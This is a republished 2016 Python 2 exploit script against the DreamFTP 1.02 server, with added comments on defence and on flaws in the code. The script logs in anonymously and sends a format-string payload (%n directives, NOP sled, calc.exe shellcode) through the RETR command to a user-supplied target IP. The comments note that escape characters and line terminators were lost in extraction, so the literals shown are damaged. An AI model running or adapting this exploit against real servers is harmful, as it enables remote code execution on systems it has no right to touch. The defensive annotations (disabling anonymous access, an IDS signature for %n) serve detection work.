BolinTech DreamFTP 1.02 RETR Buffer Overflow
Posted on 05 November 2016
# Historical public exploit listing (2016) for BolinTech DreamFTP 1.02, kept as a
# reference sample of a format-string vulnerability reached through the FTP RETR
# command: the payload relies on `%n` directives, which the server evidently passes
# through an uncontrolled format string. The listing is reproduced as published; the
# backslash of every `\x` escape and the CRLF terminators of the FTP commands did not
# survive extraction, so the string literals below are plain ASCII text as shown.
#
# Defender notes: the payload is delivered over an anonymous login, so disabling
# anonymous access (or the product entirely -- it is long unmaintained) removes the
# exposure; on the wire the RETR argument carries `%n` and long runs of `%8x`, which
# is a simple signature for FTP command logging or an IDS rule.
import socket
import os   # unused
import sys  # unused

# Author banner, printed verbatim as published.
print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln # Date: 2016.11.04 # Exploit Author: Greg Priest # Version: DreamFTPServer1.0.2 # Tested on: Windows7 x64 HUN/ENG Professional '''

ip = raw_input("Target ip: ")   # Python 2 prompt; the address is not validated
port = 21   # plain-text FTP control channel

# Format-string payload. The `%n` directives are the write primitive: a format string
# under attacker control is the whole bug, and a constant format string (or a
# -Wformat-security style build warning) on the server side would have prevented it.
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
# NOP sled as published (escapes lost in extraction; see header comment).
nop = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'
# Earlier payload variant left commented out by the author.
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%nx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'

#shellcode calc.exe
# Benign proof-of-execution payload per the author's comment (launches calc.exe).
shellcode =(
    "x31xdbx64x8bx7bx30x8bx7f" +
    "x0cx8bx7fx1cx8bx47x08x8b" +
    "x77x20x8bx3fx80x7ex0cx33" +
    "x75xf2x89xc7x03x78x3cx8b" +
    "x57x78x01xc2x8bx7ax20x01" +
    "xc7x89xddx8bx34xafx01xc6" +
    "x45x81x3ex43x72x65x61x75" +
    "xf2x81x7ex08x6fx63x65x73" +
    "x75xe9x8bx7ax24x01xc7x66" +
    "x8bx2cx6fx8bx7ax1cx01xc7" +
    "x8bx7cxafxfcx01xc7x89xd9" +
    "xb1xffx53xe2xfdx68x63x61" +
    "x6cx63x89xe2x52x52x53x53" +
    "x53x53x53x53x52x53xffxd7")
# Trailing space stands where the command terminator was in the published source.
remotecode = overflow + nop + shellcode + ' '

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))   # socket.connect() returns None; `connect` is never read
s.recv(1024)   # server greeting; no response in this script is ever checked
# Anonymous login is sufficient to reach the vulnerable command -- the reason
# restricting anonymous access is an effective mitigation for this bug class.
s.send('USER anonymous ')
s.recv(1024)
# RFC 959 spells this command PASS; 'PASSW' is kept as published.
s.send('PASSW hacker@hacker.net ')
s.recv(1024)
print remotecode
# Printed before the payload is sent, so this is not an indication of success.
print ''' Successfull Exploitation! '''
message = 'RETR ' + remotecode
s.send(message)
s.recv(1024)
# Bug as published: missing `()`, so the method is referenced but never called and
# the socket is only released when the interpreter exits.
s.close